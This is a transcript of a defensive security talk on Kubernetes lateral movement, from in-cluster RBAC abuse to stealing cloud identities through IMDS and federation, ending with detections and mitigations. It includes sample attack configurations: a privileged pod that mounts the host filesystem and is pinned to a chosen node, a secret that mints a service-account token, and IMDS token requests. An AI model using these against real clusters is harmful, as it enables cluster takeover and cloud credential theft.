I'm Yossi Weizman and with me is Ron Pliskin. We are from Microsoft Defender for Cloud, and today we are going to talk about lateral movement in Kubernetes. So this is the agenda for today. We will start by talking about identities in Kubernetes. Then we will talk about inner-cluster lateral movement. We will speak about cluster-to-cloud lateral movement in the various cloud providers. Then we will talk about detections and mitigations, and then we will have some key takeaways. So let's start with an overview of identities in Kubernetes. When we're talking about identities in Kubernetes, we are usually talking about three main areas. The first one is how users or applications from outside the cluster authenticate with the cluster. For example, if I need to deploy resources, or I have a DevOps pipeline that needs to deploy resources, how do we authenticate with the cluster? The second one is how workloads in the cluster authenticate within the cluster with the Kubernetes API server. And the third one is how workloads in the cluster authenticate with resources in the cloud outside the cluster. For example, if I have a pod that needs access to cloud storage, how does this pod authenticate with the cloud storage? In our talk, we will focus on points two and three. Point two will be relevant for the inner-cluster lateral movement, and point three will be relevant for the cluster-to-cloud lateral movement. So we are starting with inner-cluster lateral movement, and let's assume that we have a pod in our cluster that is compromised. Pods can become compromised in multiple ways. Let's say that I have a pod that runs a web application, that web application is vulnerable, and somebody exploited this vulnerability. So now we have a cluster with a compromised pod. Here we can see a Kubernetes cluster: you can see the control plane and you can see the nodes that are running the pods. And here is pod A, which is compromised.
So what is lateral movement in the cluster? It could be multiple things. It could be a movement from one pod to another pod. It could be a movement from a pod to a node. And ideally, attackers would like to achieve a cluster takeover, which means that they would have full control over the entire cluster. The question is, how can attackers leverage the compromised pod that they have access to in order to gain cluster takeover? In other words, we are asking which tools the attacker has to move laterally in the cluster. Here we can see two identity types that we have inside the cluster. The first one is the service account that is used by pod A. If the attacker has access to pod A, obviously they also have access to the service account token of pod A. And the second one is the node's identity that is used by the kubelet. So if attackers somehow manage to escape from pod A to the underlying node, or they somehow manage to get access to the file system of the underlying node, and we will see how they might achieve that shortly, then they can also use this identity. All right. So how can attackers leverage those identities? The good news is that it has become a little bit more difficult now, because in newer versions of Kubernetes there are some security features that restrict operations that can lead to cluster takeover and lateral movement. We are going to talk about two notable ones. The first one is that read-secret permissions are no longer enough for lateral movement. In the past, as probably many of you know, Kubernetes stored service account tokens as secret objects. So if I could read secrets, I could also read tokens of service accounts. In newer versions of Kubernetes, that's no longer the case: Kubernetes doesn't automatically store service account tokens as Kubernetes secrets.
And if I want to acquire a token, I must use a dedicated API call that gives me a short-lived one. The second thing is that a node takeover doesn't necessarily mean a cluster takeover. In the past, once you obtained the identity of the node, the kubelet identity, you became practically a cluster admin, because this identity is very permissive. But in newer versions of Kubernetes that's no longer the case, because the kubelet is restricted and can only control resources that are scheduled on its own node, meaning on that particular node. So it doesn't mean a cluster takeover anymore. This is achieved by the Node authorizer and the NodeRestriction admission controller. So there have been some improvements in this area, but some common misconfigurations still allow lateral movement. Now we will see a real-world example that was the root cause of a vulnerability in a containerized application. All right, so in our example, we have an application that has the permission to update itself. What does that mean? In this case, we have a deployment resource that uses a service account that has permissions to update the deployment object. You can see here that we have a cluster role definition that the service account is bound to, and it has permissions to update this specific deployment: you can see the resource name that specifies this specific deployment. So this is the cluster role definition. Maybe it sounds harmless, because now we have a deployment with a service account that can update itself, not other objects in the cluster. So it sounds fine. I mean, it can update only itself. But it means that now the application can change its own configuration. And specifically, it means that the application can change its configuration to run a privileged container. And if a container is privileged, it can access the underlying node. And if it can access the underlying node, it can access the node's identity, like we said.
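A rough sketch of what such a cluster role definition could look like; the names here (`self-updater`, `my-app`) are hypothetical stand-ins for whatever the real application used, but `resourceNames` is the field that scopes the update permission to that single deployment:

```yaml
# Hypothetical ClusterRole that only allows updating one named
# deployment -- the "update itself" pattern described above.
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: self-updater            # hypothetical name
rules:
- apiGroups: ["apps"]
  resources: ["deployments"]
  resourceNames: ["my-app"]     # restricts the rule to this deployment only
  verbs: ["update", "patch"]
```

A ClusterRoleBinding would then bind this role to the deployment's service account.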
Now, as we said, obtaining the node's identity doesn't necessarily mean a cluster takeover anymore, like we explained. But we can also specify in the configuration that we want to be scheduled on a specific node by using the node selector. So what we have now is the ability to deploy a privileged container, and we can decide on which node we want to deploy it. So practically, we achieve a cluster takeover. Let's see it. We have a pod. It can change its own deployment configuration. So now we have a new pod; this time the pod is privileged, and it can access the underlying node. Now we will schedule one on node two, and now we will schedule one on node three. So now we have a cluster takeover. In this example, we saw a permission that may lead to cluster takeover, and again, it was based on a real-world vulnerability. Let's go over a few more permissions that may also lead to cluster takeover. All right, so this is the table. The first one is very similar to what we just saw: if you can create a new pod or a new controller in the cluster, you can specify its configuration, you can specify it to be privileged, and you can also specify the node that you want it to be scheduled on, and practically you can become a cluster admin. The second one is what we just talked about: updating a controller. In our case, we updated a deployment, but it could be any other controller as well. The third one is an interesting one, because as we said before, in newer versions of Kubernetes, Kubernetes doesn't automatically create secrets with service account tokens. However, as a user, I can still manually create a secret and specify that I want it to be a token for a service account; I just annotate the secret with the name of the service account that I want. So if I have the permission to create a new secret, and then the permission to read its value, I can get a long-lived token of any service account that I want.
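For the first two rows of the table, the malicious pod spec might look roughly like this (image and node names are hypothetical); `privileged: true` plus a hostPath mount gives access to the node's file system, and `nodeName` pins the pod to a node the attacker chooses:

```yaml
# Hypothetical pod spec an attacker could create directly, or inject
# as the template of an updated deployment: privileged, with the host
# filesystem mounted, pinned to a chosen node.
apiVersion: v1
kind: Pod
metadata:
  name: takeover-pod            # hypothetical name
spec:
  nodeName: node-2              # schedule onto the node we want to take over
  containers:
  - name: shell
    image: busybox              # placeholder image
    command: ["sleep", "infinity"]
    securityContext:
      privileged: true          # breaks container isolation toward the node
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /                   # the node's entire filesystem
```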
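The third row, manually minting a long-lived service account token, takes a single secret object; the annotation names the target service account (here a hypothetical `target-sa`), and Kubernetes populates the token:

```yaml
# Hypothetical secret that asks Kubernetes to generate a long-lived
# token for an existing service account.
apiVersion: v1
kind: Secret
metadata:
  name: stolen-token            # hypothetical name
  annotations:
    kubernetes.io/service-account.name: target-sa  # SA to mint a token for
type: kubernetes.io/service-account-token
```

Reading the secret back afterwards yields the generated token in its `data` field.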
And the fourth one here in the table is the permission that you need in order to create short-lived tokens. So that was inner-cluster lateral movement. Now we will move to the second topic, which is lateral movement from the cluster to the cloud, and we will see how the two topics are actually sometimes related to each other. Thanks, Yossi. So after we talked about lateral movement inside Kubernetes clusters, we will now move on to the second topic, which is lateral movement from the cluster to cloud resources that are outside of the cluster. So let's try to assess the imminence of an attacker pivoting from a cluster to the underlying cloud environment. In order to do so, we should first acknowledge the different ways in which a managed cluster interacts with cloud resources. There are two types of interactions. The first is the maintenance routines. For example, with Kubernetes being so dynamic, it frequently needs to allocate or decommission VMs, and this is done by ongoing engagement with cloud APIs. The second type of interaction stems from the need to support customer workloads. For example, a customer runs a pod that has a web service inside, and this web service pushes data to or reads data from an S3 bucket that is outside of the cluster. So as you can expect, clusters that live inside the cloud are tightly coupled with its resources. So how do Kubernetes clusters authenticate themselves against cloud APIs? The answer is that there have been advancements in the way that Kubernetes clusters can establish trust with cloud resources. In our talk today, we'll go over the following authentication methods. The first one is storing a file locally on the Kubernetes node that holds cloud credentials. Then we will talk about direct and indirect access to IMDS. Lastly, we will show how Kubernetes identities can be federated as cloud identities, which is now powered by OpenID Connect.
And while we dive into each of these methods, we will demonstrate how attackers can leverage each of them to advance their foothold from cluster to cloud. So we are starting off with the way that AKS used to authenticate with Azure resources. With this method, AKS stores a file that has a service principal secret in it, and it was stored on each of the Kubernetes nodes. Service principals are application-based identities in Azure; they are like service accounts in Kubernetes. With this authentication method, access to the node's file system meant elevation to a contributor role scoped to the Azure resource group that hosts the cluster. So now let's see in action how attackers can leverage it. Let's assume pod A is compromised and it has a service account attached to it. Now, if this service account is authorized to create new pods, the attacker can abuse this permission and create a new pod with a configuration that mounts the credential file into it. This mount results in a new container that can access the local credential file and act under the SPN identity. And this is how an attacker could have achieved a backdoor container with access to Azure APIs. As mentioned, this was the default configuration for AKS in the past. Note that for this method, the attacker needed access to the underlying node, and in most deployments it's not trivial to break the container isolation. In the next method coming up, we will see that escaping from a container is no longer a requirement. So let's move on to the second authentication method, which is currently the default in Azure, AWS and GCP: we're going to talk about IMDS. IMDS stands for instance metadata service. It is a special endpoint that is accessible to every VM hosted in the cloud, and this type of service is implemented by all three major cloud providers. It basically allows VMs in the cloud to query parameters about themselves. For example, what is my cloud identifier?
In which region am I deployed, or what are my network settings? But also, and perhaps most interestingly, VMs can ask IMDS for tokens that represent cloud identities. All cloud providers support attaching identities to VMs. In Azure, we call it a managed identity; in AWS, it's called an EC2 role; and in GCP, it's a service account. Here you can see how those APIs look in each of the cloud providers, and one important note is that IMDS endpoints do not require authentication. For security, they rely on the fact that each VM can only query its own metadata service. In managed clusters, Kubernetes nodes are VMs in the cloud, right? So as such, they have access to the metadata service like any other VM. And by default, pods can also access their node's metadata service. That means that pods can acquire tokens of the identities assigned to the node they are running on. Of course, the permissions these tokens will have depend on the cloud provider and the specific configuration of the environment, which we'll now see in Azure, AWS and GCP. We will start with Azure. AKS clusters use managed identities for their operation. It's perhaps worth calling out that a managed identity is, behind the scenes, a special type of service principal; the difference between managed identities and SPNs is that managed identities eliminate the need for developers to manage their credentials. So this is the list of default managed identities created by AKS. Some of them are quite powerful: in red, you can see that in some configurations the managed identities have a contributor role on the node resource group. Also, users can add more managed identities or modify the permissions of existing managed identities, all depending on their needs. For example, if my application needs access to a storage account or to a key vault, I can add permissions to these resources for an existing managed identity. Like the table from the previous slide, AWS operates in a similar manner.
EKS clusters use EC2 roles for their operations. So we see three roles. The first role includes permissions to fetch images from the container registry. The second one has permissions on compute resources, and the third one has permissions to edit the network configuration of an EKS cluster. GKE also comes with built-in IAM service accounts, but interestingly, GKE uses the default compute engine service account, which has the editor role assigned to it. This effectively challenges the security boundary of the GKE cluster: it means that if a pod in GKE gets compromised, the permissions the attacker can achieve go beyond the cluster and can impact the entire project. For folks here who work with GKE, it's true that the permissions are limited by access scopes, which restrict the APIs that this service account can access, but even with this limitation, this role is still quite powerful. For example, it has read permissions on data: it can read data from any cloud storage bucket in the project, as you can see in the image on the slide. So how does lateral movement look in this method? Here again is our cluster; let's keep only one node to simplify things a bit. As we discussed, this node has access to an IMDS instance. Now the pod can retrieve a token for a cloud identity. The metadata service returns a valid token, and depending on the permissions assigned to that identity, this pod can query different cloud APIs. For example, it can read files from cloud storage services. Another example would be fetching secrets from Azure Key Vault or AWS KMS, or even getting the credentials of other Kubernetes clusters that are deployed in the cloud. It always boils down to the permissions assigned to the identity for which the attacker can acquire tokens. So what is the problem we just saw? On the one hand, we saw that pods can freely access their node's identity, and we probably want to limit that.
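To make the direct-IMDS path concrete, here is a small Python sketch of the token requests a process in a pod could issue; the endpoints and required headers are the documented ones for each provider, but treat the exact query parameters as illustrative:

```python
# Sketch of the metadata requests a compromised pod could build to
# obtain cloud identity tokens. Only the request parameters are
# constructed here; actually sending them only works from inside a
# cloud VM or pod.

AZURE_IMDS = {
    "url": ("http://169.254.169.254/metadata/identity/oauth2/token"
            "?api-version=2018-02-01"
            "&resource=https://management.azure.com/"),
    "headers": {"Metadata": "true"},           # mandatory for Azure IMDS
}

AWS_IMDS = {
    # IMDSv1 path; with IMDSv2 a session token must first be obtained
    # via PUT http://169.254.169.254/latest/api/token
    "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "headers": {},
}

GCP_IMDS = {
    "url": ("http://metadata.google.internal/computeMetadata/v1/"
            "instance/service-accounts/default/token"),
    "headers": {"Metadata-Flavor": "Google"},  # mandatory for GCP metadata
}

def token_request(provider: dict) -> tuple[str, dict]:
    """Return the (url, headers) pair for a provider's token endpoint."""
    return provider["url"], provider["headers"]
```

Note that none of these requests carry credentials: as said above, the only gate is network reachability of the link-local endpoint.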
But at the same time, in some cases, pods may need to legitimately acquire tokens to support the workloads they are running. So we want to allocate a specific identity to each pod that needs one, and we want to make sure that pods have granular access to these identities. Luckily, this can be achieved, and we are going to see two concepts that serve this goal. The first one is indirect access to IMDS, and the second is a federation of Kubernetes identities as cloud identities. Let's start with indirect access to IMDS. We are not going to elaborate too much here, because this mechanism is not commonly used anymore, but in general, in this method, when a pod calls IMDS, its traffic is redirected to a local server, and then the local server queries IMDS on the pod's behalf. This is implemented by the AAD Pod Identity project, which is now deprecated. So we will quickly go over how AAD Pod Identity operates. The first step is that traffic from pod A to IMDS is intercepted and redirected to a local server; that's the NMI pod that you see on the screen. Then the local server requests pod A's identity from the metadata service, and in step three, the NMI returns the IMDS response, the token, back to pod A. AAD Pod Identity has a few limitations that we won't really cover today, but I should just mention that it does not support all CNIs. All right, thanks Ron. So now we'll move to the last method for cloud authentication, the last method in which pods in the cluster can authenticate with the cloud, and it is based on OIDC, or OpenID Connect. This method is implemented by all major cloud providers: Azure, AWS and GCP. Here you can see what each cloud provider calls this feature: in Azure it's AAD workload identity, in AWS it's IRSA, and in GCP it's Workload Identity. In GCP, the implementation actually uses some aspects of the previous concept that we saw.
They also intercept the traffic from the pod to IMDS and redirect it to a local server. But generally, the concept is similar between the cloud providers. In this method, the Kubernetes cluster is used as an OIDC identity provider, which means that cloud identity platforms such as Azure Active Directory can trust tokens that are issued by the cluster. And because of this trust, applications in the cluster can exchange a token of a service account for a token of a cloud identity. This is a big advantage of this method, because it means that pods can now authenticate with the cloud using their native Kubernetes identity, which is their service account. This is a big difference from everything we saw so far: until now, if a pod wanted to authenticate with the cloud, the pod somehow needed to acquire a cloud credential. But now pods can authenticate with the cloud using their own identity, using the service accounts that they already have. The way it works is that users can bind a Kubernetes service account to a cloud identity, and after this binding, which is called federation, applications can exchange the Kubernetes service account token for a token of the correlated cloud identity. All right, so let's see the flow at a high level. First, the kubelet projects a signed service account token into the pod; this is a valid JWT that is signed by the cluster. So now our pod has a JWT of the service account, and the pod can send it to the cloud identity service, again, like Azure Active Directory, AWS IAM or GCP, and request to exchange the service account token for an identity token. The cloud identity service then verifies that this service account token is indeed legitimate, and checks that the token was indeed issued by a cluster that the service trusts.
It does this by using the cluster's OIDC endpoint, and if the verification is successful, the cloud identity platform returns a cloud identity token to the pod. So now our pod has a valid cloud token, and it can use it to authenticate with cloud resources; for example, it can authenticate with cloud storage if it needs to. This is an example from AAD, from Azure Active Directory, and you can see this binding, this kind of federation. What we have on this page is a setting of a specific AAD application, and you can see that we bind a Kubernetes service account to this application. You can see the name of the service account that will be bound, and you can also see the OIDC endpoint that AAD will use to validate this service account token. All right, so let's talk for a moment about GCP specifically, because in GCP there is something interesting: there is a unified identity pool for the entire project. What does that mean? It means that there is a single binding between a cloud identity and a service account, and the service account is represented by the namespace name plus the service account name. Let's see an example. We see two clusters here, cluster A and cluster B. They are in the same project. Both have a namespace with the same name and a service account with the same name: both have a namespace called monitoring and a service account named SA1. And if we bind this service account to a cloud identity, in this case one called MyCloudApp, it means that both service accounts are bound to the same cloud identity. That's how it works. Now let's say that we have another cluster in our project, cluster C, and let's say that this cluster is compromised; for example, we saw in the first section how attackers might achieve a cluster takeover. So this cluster, cluster C, is compromised.
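The reason the cluster doesn't matter here can be seen in the shape of the IAM principal GCP uses for a federated Kubernetes service account: it is built from the project's identity pool, the namespace name, and the service account name only. A small sketch, with hypothetical project and names:

```python
# Sketch: the IAM member string used by GKE Workload Identity is
# derived from project, namespace and Kubernetes SA name -- the
# cluster name never appears, which is what makes the collision
# across clusters possible.

def wi_member(project_id: str, namespace: str, ksa: str) -> str:
    """Build the Workload Identity IAM member for a Kubernetes SA."""
    return f"serviceAccount:{project_id}.svc.id.goog[{namespace}/{ksa}]"

# Same namespace and SA names in two different clusters of one project:
member_cluster_a = wi_member("my-project", "monitoring", "sa1")
member_cluster_b = wi_member("my-project", "monitoring", "sa1")
# Both resolve to the identical IAM principal, so a binding to
# MyCloudApp trusts tokens coming from either cluster.
```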
And now, if the attackers can create a namespace and a service account, which they can, assuming they gained a cluster takeover, they can impersonate that cloud identity, right? Because there is only one binding per project, if they can create a service account and a namespace with the same names, they get access to this cloud identity. So as we said, attackers get access to the cloud identity just by creating resources with a specific name. What we see here is that we must trust all our clusters in the project. Many times, we consider the cluster as our security boundary, meaning that there is trust inside the cluster but not outside of it. But here we can see that our security boundary is actually not the cluster, but the entire project. So this is what we saw so far: we talked about inner-cluster lateral movement and about cluster-to-cloud lateral movement. Now let's talk about how we can detect and prevent those techniques. We'll start with detections and then move to mitigations. As we already saw, when we're talking about Kubernetes, we must consider both the Kubernetes level and the cloud level, and this applies to detections and mitigations as well. In Kubernetes, when it comes to detection, we have a very powerful tool for monitoring the cluster called the Kubernetes audit log. It's native in Kubernetes and it gives you visibility into the operations in the cluster; it basically monitors the Kubernetes API server. You can use it, for example, to detect deployment of abnormal images, pods with suspicious configurations, for example with suspicious volume mounts, as well as reconnaissance activity and more suspicious operations. Cloud providers also have auditing services: each cloud provider has an auditing service that allows you to track the behavior of the cloud identities.
Now, of course, this also covers the cloud identities that are used by the Kubernetes workloads. In this example, we can see Azure activity log, which is the auditing service of Azure. You can see in the image a managed identity, a cloud identity used by Kubernetes, that reads storage account keys. Maybe that's suspicious; it's something that you want to monitor. The other clouds have such services as well: CloudTrail in AWS and Cloud Audit Logs in GCP. All right, so that was detections. Now let's speak about mitigations. In December, we released the third version of the threat matrix for Kubernetes. The threat matrix is a knowledge base of attack techniques against Kubernetes, and the new version now also contains mitigation techniques. The threat matrix is completely open source, and you can find it at this address. So let's see how we can work with it. Here is the new threat matrix for Kubernetes. We can see the tactics and the techniques in each tactic. Let's go to the lateral movement tactic, because we just talked about lateral movement, and let's pick a technique: access to cloud resources. This technique covers lateral movement from the cluster to the cloud, like our session, and you can see the description of this technique. At the bottom, you can now find the mitigation techniques which can help you prevent this attack from happening. So let's pick one mitigation: allocate specific identities to pods. Here you can see the description of this mitigation technique. Let's see another example quickly. Let's go to the technique container service account, which talks about how attackers might use service accounts for lateral movement in the cluster. Once again, you can see the description of the attack technique. Let's go to mitigations and pick one, for example, disable service account automount.
And here you can see the mitigation. Thanks. So as we enter the closing section of this presentation, I will share a bit about the process behind building this matrix. In general, we kicked off the journey of building a knowledge base, a threat matrix, for services that we put effort into building security offerings for. We decided to rely on the MITRE ATT&CK framework, as it has become the de facto standard for the entire EDR industry. Back at the time, we knew that MITRE ATT&CK was too focused on the operating system level and lacked visibility into cloud and container TTPs. Together with Kubernetes being so rapidly adopted, this drove us to experiment with building a knowledge base of attack techniques dedicated to Kubernetes. And so we released the first version of the Microsoft threat matrix for Kubernetes in April 2020. Shortly after the release, we realized how well it resonated within the container ecosystem, with customers starting to measure our coverage based on this matrix, and even competitors sharing their areas of strength on top of our matrix. Eventually, this led MITRE to embrace a large portion of Microsoft's matrix into their enterprise ATT&CK framework, which was announced in a joint publication between Microsoft and MITRE in April 2021. And as Yossi just described, we released the third version of the Microsoft matrix in December 2022, where we aimed to introduce a new layer that consists of mitigation techniques. Our motivation was to map each TTP to corresponding mitigation steps that instruct Kubernetes users on how they should reduce their attack surface. Hopefully, this dimension of mitigation steps will prevent Kubernetes attacks from happening to begin with. So, key takeaways.
We demonstrated here today that even with the great security advancements being pushed to Kubernetes, and even with the efforts led by the cloud providers that wrap Kubernetes clusters, there is still much work ahead of us as a community to strengthen the overall security posture of managed clusters. As a quick recap of today's session: we saw the maturity of shifting away from storing permissive credential files locally, to a state where all major cloud providers now support federating Kubernetes identities and binding them with cloud identities. As an industry, we have proven to take significant steps towards more secure environments. But in the meantime, we also saw that built-in identities of managed clusters can be abused and manipulated, and in some cases they themselves violate the security boundary of the cluster. Therefore, we are calling on you to: one, implement a holistic strategy for Kubernetes security by considering both the cluster and cloud levels. Two, identities are a key aspect of Kubernetes security, so monitor their activity using auditing tools and adhere to the least-privilege principle. And lastly, use the mitigations in the matrix to prevent potential attacks. And with that, thank you.